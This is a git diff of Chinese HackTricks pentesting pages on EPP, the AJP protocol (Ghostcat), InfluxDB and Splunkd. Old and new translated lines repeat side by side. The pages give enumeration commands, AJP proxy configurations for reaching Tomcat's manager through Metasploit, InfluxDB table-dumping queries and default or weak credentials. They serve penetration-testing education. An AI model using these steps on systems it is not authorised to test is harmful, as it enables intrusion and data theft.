* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 基本信息
可扩展供应协议EPP是一种网络协议用于由域名注册局和注册商管理域名和其他互联网资源。它实现了域名注册、续订、转移和删除过程的自动化确保域名系统DNS中不同实体之间的标准化和安全通信框架。EPP被设计为灵活和可扩展允许根据互联网基础设施的需求添加新功能和命令。
可扩展的配置协议 (EPP) 是一种网络协议,用于 **域名和其他互联网资源的管理**,由域名注册机构和注册商使用。它使域名注册、续订、转移和删除过程的自动化成为可能,确保域名系统 (DNS) 中不同实体之间的标准化和安全的通信框架。EPP 旨在灵活和可扩展,允许随着互联网基础设施需求的发展添加新功能和命令。
基本上,这是一个**顶级域名注册商将提供给域名注册商**以在顶级域中注册新域名的协议之一
基本上,它是 **顶级域名注册商将提供给域名注册商的协议之一**,用于在顶级域名中注册新域名
### 渗透测试
[**在这篇非常有趣的文章中**](https://hackcompute.com/hacking-epp-servers/),您可以看到一些安全研究人员发现该协议的一些**实现存在XXEXML外部实体漏洞**因为该协议使用XML进行通信这可能会使攻击者接管数十个不同的顶级域名。
[**在这篇非常有趣的文章中**](https://hackcompute.com/hacking-epp-servers/) 你可以看到一些安全研究人员发现多个 **该协议的实现** 存在 XXE (XML 外部实体) 漏洞,因为该协议使用 XML 进行通信,这将允许攻击者接管数十个不同的顶级域名。
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

109
network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
View file

@ -1,43 +1,44 @@
# 8009 - 渗透测试 Apache JServ 协议 (AJP)
# 8009 - Pentesting Apache JServ Protocol (AJP)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
随时了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)立即与顶尖黑客合作!
**今天就加入我们,进入** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作
## 基本信息
源:[https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)
自: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)
> AJP 是一种传输协议。它是 HTTP 协议的优化版本,允许独立的 Web 服务器(如 [Apache](http://httpd.apache.org/))与 Tomcat 进行通信。在历史上Apache 在提供静态内容方面比 Tomcat 快得多。其想法是让 Apache 在可能的情况下提供静态内容,但将请求代理到 Tomcat 处理与 Tomcat 相关的内容。
> AJP 是一种线协议。它是 HTTP 协议的优化版本,允许独立的 web 服务器如 [Apache](http://httpd.apache.org/) 与 Tomcat 通信。历史上Apache 在提供静态内容方面比 Tomcat 快得多。其想法是让 Apache 在可能的情况下提供静态内容,但将请求代理到 Tomcat 以获取与 Tomcat 相关的内容。
另外有趣的是
也很有趣
> ajp13 协议是基于数据包的。出于性能原因二进制格式显然优于更易读的纯文本。Web 服务器通过 TCP 连接与 Servlet 容器通信。为了减少昂贵的套接字创建过程Web 服务器将尝试维护持久的 TCP 连接到 Servlet 容器,并重用连接进行多个请求/响应周期。
> ajp13 协议是面向数据包的。出于性能原因显然选择了二进制格式而不是更易读的纯文本。web 服务器通过 TCP 连接与 servlet 容器通信。为了减少创建套接字的昂贵过程web 服务器将尝试保持与 servlet 容器的持久 TCP 连接,并重用一个连接进行多个请求/响应周期。
**默认端口:** 8009
```
@ -46,15 +47,15 @@ PORT STATE SERVICE
```
## CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat)
如果AJP端口暴露Tomcat可能会受到Ghostcat漏洞的影响。这里有一个[exploit](https://www.exploit-db.com/exploits/48143)可以利用这个问题。
如果 AJP 端口暴露Tomcat 可能会受到 Ghostcat 漏洞的影响。这里有一个 [exploit](https://www.exploit-db.com/exploits/48143) 可以利用这个问题。
Ghostcat是一个LFI漏洞但受到一定限制只能提取特定路径下的文件。尽管如此这可能包括诸如`WEB-INF/web.xml`之类的文件这些文件可能泄露像Tomcat接口的凭据这样的重要信息具体取决于服务器的设置。
Ghostcat 是一个 LFI 漏洞,但有些限制:只能提取来自特定路径的文件。尽管如此,这仍然可以包括像 `WEB-INF/web.xml` 这样的文件,这可能会泄露重要信息,如 Tomcat 接口的凭据,具体取决于服务器设置。
修补版本为9.0.31或更高版本8.5.51和7.0.100已解决了此问题。
在 9.0.31、8.5.51 和 7.0.100 或更高版本中已修复此问题。
## 枚举
## Enumeration
### 自动化
### Automatic
```bash
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <IP>
```
@ -62,14 +63,14 @@ nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <IP>
## AJP 代理
### Nginx 反向代理 & AJP
### Nginx 反向代理 AJP
[查看 Docker 化版本](8009-pentesting-apache-jserv-protocol-ajp.md#Dockerized-version)
当我们遇到一个开放的 AJP 代理端口8009 TCP我们可以使用带有 `ajp_module` 的 Nginx 来访问“隐藏”的 Tomcat 管理器。这可以通过编译 Nginx 源代码并添加所需的模块来实现,具体步骤如下
当我们遇到一个开放的 AJP 代理端口8009 TCP我们可以使用带有 `ajp_module` 的 Nginx 访问“隐藏”的 Tomcat 管理员。这可以通过编译 Nginx 源代码并添加所需模块来完成,如下所示
* 下载 Nginx 源代码
* 下载所需模块
* 下载所需模块
* 使用 `ajp_module` 编译 Nginx 源代码。
* 创建一个指向 AJP 端口的配置文件
```bash
@ -86,22 +87,7 @@ make
sudo make install
nginx -V
```
```diff
-# server {
-# listen 80;
-# server_name example.com;
-# location / {
-# proxy_pass http://127.0.0.1:8009;
-# }
-# }
+# server {
+# listen 80;
+# server_name example.com;
+# location / {
+# proxy_pass http://127.0.0.1:8009;
+# }
+# }
```
在`/etc/nginx/conf/nginx.conf`的`http`块中注释掉整个`server`块,并在其中添加以下行。
```shell-session
upstream tomcats {
server <TARGET_SERVER>:8009;
@ -115,7 +101,7 @@ ajp_pass tomcats;
}
}
```
启动 Nginx 并通过向本地主机发出 cURL 请求来检查一切是否正常工作。
启动 Nginx并通过向本地主机发出 cURL 请求来检查一切是否正常工作。
```html
sudo nginx
curl http://127.0.0.1:80
@ -154,14 +140,14 @@ curl http://127.0.0.1:80
git clone https://github.com/ScribblerCoder/nginx-ajp-docker
cd nginx-ajp-docker
```
替换`nginx.conf`中的`TARGET-IP`为AJP IP然后构建并运行。
`nginx.conf` 中的 `TARGET-IP` 替换为 AJP IP然后构建并运行。
```bash
docker build . -t nginx-ajp-proxy
docker run -it --rm -p 80:80 nginx-ajp-proxy
```
### Apache AJP 代理
### Apache AJP Proxy
遇到只有 8009 端口开放而没有其他可访问的 web 端口是罕见的。然而,仍然可以利用 **Metasploit** 来利用它。通过利用 **Apache** 作为代理,请求可以被重定向到端口 8009 上的 **Tomcat**
遇到一个开放的8009端口而没有其他可访问的网络端口是很少见的。然而仍然可以使用**Metasploit**进行利用。通过将**Apache**作为代理可以将请求重定向到8009端口上的**Tomcat**
```bash
sudo apt-get install libapache2-mod-jk
sudo vim /etc/apache2/apache2.conf # append the following line to the config
@ -179,40 +165,41 @@ sudo a2enmod proxy_http
sudo a2enmod proxy_ajp
sudo systemctl restart apache2
```
这种设置具有绕过入侵检测和防范系统IDS/IPS的潜力这是由于**AJP协议的二进制特性**,尽管这种能力尚未经过验证。通过将常规的Metasploit Tomcat漏洞利用指向`127.0.0.1:80`,您可以有效地控制目标系统。
此设置提供了绕过入侵检测和防御系统IDS/IPS的潜力原因在于**AJP协议的二进制特性**,尽管这一能力尚未得到验证。通过将常规的Metasploit Tomcat漏洞利用指向`127.0.0.1:80`,您可以有效地控制目标系统。
```bash
msf exploit(tomcat_mgr_deploy) > show options
```
## 参考资料
## 参考文献
* [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx\_ajp\_module)
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客活动的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金发布和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作吧!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

70
network-services-pentesting/8086-pentesting-influxdb.md
View file

@ -1,61 +1,62 @@
# 8086 - InfluxDB 渗透测试
# 8086 - Pentesting InfluxDB
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=8086-pentesting-influxdb) 可轻松构建并通过全球**最先进**的社区工具**自动化工作流程**。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=8086-pentesting-influxdb) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=8086-pentesting-influxdb" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 基本信息
**InfluxDB** 是由 InfluxData 开发的开源**时间序列数据库TSDB**。TSDB 专为存储和提供时间序列数据而优化,这些数据由时间戳-值对组成。与通用数据库相比TSDB 在时间序列数据集的**存储空间**和**性能**方面提供了显著改进。它们采用专门的压缩算法,并可配置为自动删除旧数据。专门的数据库索引增强了查询性能。
**InfluxDB** 是由 InfluxData 开发的开源 **时间序列数据库 (TSDB)**。TSDB 针对存储和服务时间序列数据进行了优化,这些数据由时间戳-值对组成。与通用数据库相比TSDB 在 **存储空间****性能** 上为时间序列数据集提供了显著的改进。它们采用专门的压缩算法,并可配置为自动删除旧数据。专门的数据库索引增强了查询性能。
**默认端口**8086
```
PORT STATE SERVICE VERSION
8086/tcp open http InfluxDB http admin 1.7.5
```
## 枚举
## Enumeration
从渗透测试人员的角度来看,这是另一个可能存储敏感信息的数据库,因此了解如何转储所有信息是很有趣的。
从渗透测试的角度来看,这是另一个可能存储敏感信息的数据库,因此了解如何转储所有信息是很有趣的。
### 认证
### Authentication
InfluxDB可能需要认证,也可能不需要
InfluxDB 可能需要身份验证,也可能不需要。
```bash
# Try unauthenticated
influx -host 'host name' -port 'port #'
> use _internal
```
如果你遇到类似这样的错误:`ERR: unable to parse authentication credentials`,这意味着它**需要一些凭据**
如果你 **遇到这样的错误**: `ERR: unable to parse authentication credentials`,这意味着它 **期望一些凭据**
```
influx username influx password influx_pass
```
存在一个漏洞,允许绕过身份验证的influxdb[**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)
在 influxdb 中存在一个漏洞,允许绕过身份验证:[**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)
### 手动枚举
这个示例的信息来自[**这里**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/)。
此示例的信息来自 [**这里**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/)。
#### 显示数据库
找到的数据库是 `telegraf``internal`会在任何地方找到这个)。
找到的数据库是 `telegraf``internal`会在任何地方找到这个)。
```bash
> show databases
name: databases
@ -66,7 +67,7 @@ _internal
```
#### 显示表/测量
[**InfluxDB文档**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting\_started/)解释说在InfluxDB中**测量**可以与SQL表并行。这些**测量**的命名方式表明了它们各自内容的特点,每个都包含与特定实体相关的数据。
The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting\_started/) 解释了 **measurements** 在 InfluxDB 中可以与 SQL 表平行。 这些 **measurements** 的命名法指示了它们各自的内容,每个都包含与特定实体相关的数据。
```bash
> show measurements
name: measurements
@ -83,7 +84,7 @@ system
```
#### 显示列/字段键
字段键类似于数据库的**列**
字段键就像数据库的 **列**
```bash
> show field keys
name: cpu
@ -104,9 +105,9 @@ inodes_used integer
[ ... more keys ...]
```
#### 转储表
#### Dump Table
最后,您可以执行类似以下操作来**转储表**
最后,您可以通过执行以下操作来**转储表**
```bash
select * from cpu
name: cpu
@ -116,31 +117,32 @@ time cpu host usage_guest usage_guest_nice usage_idle
1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101
```
{% hint style="warning" %}
进行身份验证绕过测试时,注意到表名需要用双引号括起来,例如:`select * from "cpu"`
一些使用身份验证绕过的测试中,注意到表的名称需要用双引号括起来,例如:`select * from "cpu"`
{% endhint %}
### 自动化身份验证
```bash
msf6 > use auxiliary/scanner/http/influxdb_enum
```
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=8086-pentesting-influxdb)轻松构建和**自动化工作流程**,由全球**最先进**的社区工具驱动。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=8086-pentesting-influxdb) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=8086-pentesting-influxdb" %}

86
network-services-pentesting/8089-splunkd.md
View file

@ -1,64 +1,65 @@
# 8089 - 渗透测试 Splunkd
# 8089 - Pentesting Splunkd
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **基本信息**
Splunk 是一个**日志分析工具**,在**收集、分析和可视化数据**方面发挥着关键作用。虽然它最初的目的不是作为**SIEM安全信息和事件管理**工具,但在**安全监控**和**业务分析**领域中变得越来越受欢迎
Splunk 是一个 **日志分析工具**,在 **收集、分析和可视化数据** 中发挥着至关重要的作用。虽然其最初的目的并不是作为 **SIEM安全信息和事件管理** 工具,但它在 **安全监控****业务分析** 领域获得了广泛的应用
Splunk 部署经常用于存储**敏感数据**,如果攻击者成功地 compromise 系统,它可以作为潜在攻击者的**宝贵信息来源**。**默认端口8089**
Splunk 部署通常用于存储 **敏感数据**,如果攻击者成功入侵系统,它可以成为 **潜在攻击者的重要信息来源****默认端口:** 8089
```
PORT STATE SERVICE VERSION
8089/tcp open http Splunkd httpd
```
{% hint style="info" %}
**Splunk Web服务器默认在端口8000上运行**。
**Splunk web 服务器默认运行在 8000 端口**。
{% endhint %}
## 枚举
### 免费版
### 免费版
Splunk Enterprise试用版在**60天后转换为免费版本****无需身份验证**。系统管理员经常安装Splunk试用版进行测试**随后被遗忘**。这将自动转换为没有任何形式身份验证的免费版,在环境中引入安全漏洞。一些组织可能由于预算限制而选择免费版本,却没有完全理解没有用户/角色管理的影响。
Splunk Enterprise 试用版在 60 天后转换为 **免费版**,该版本 **不需要身份验证**。系统管理员安装 Splunk 的试用版以进行测试并 **随后被遗忘** 是很常见的。这将自动转换为没有任何形式身份验证的免费版,从而在环境中引入安全漏洞。一些组织可能由于预算限制选择免费版,而没有完全理解没有用户/角色管理的影响。
### 默认凭据
在旧版本的Splunk中默认凭据为**`admin:changeme`**,方便地显示在登录页面上。\
然而,**最新版本的Splunk**在**安装过程中设置凭据**。如果默认凭据不起作用,值得检查常见弱密码,如`admin``Welcome``Welcome1``Password123`等。
在旧版本的 Splunk 中,默认凭据是 **`admin:changeme`**,这些凭据在登录页面上方便地显示。\
然而,**最新版本的 Splunk** 在 **安装过程中设置凭据**。如果默认凭据无效,值得检查常见的弱密码,如 `admin`、`Welcome`、`Welcome1`、`Password123` 等。
### 获取信息
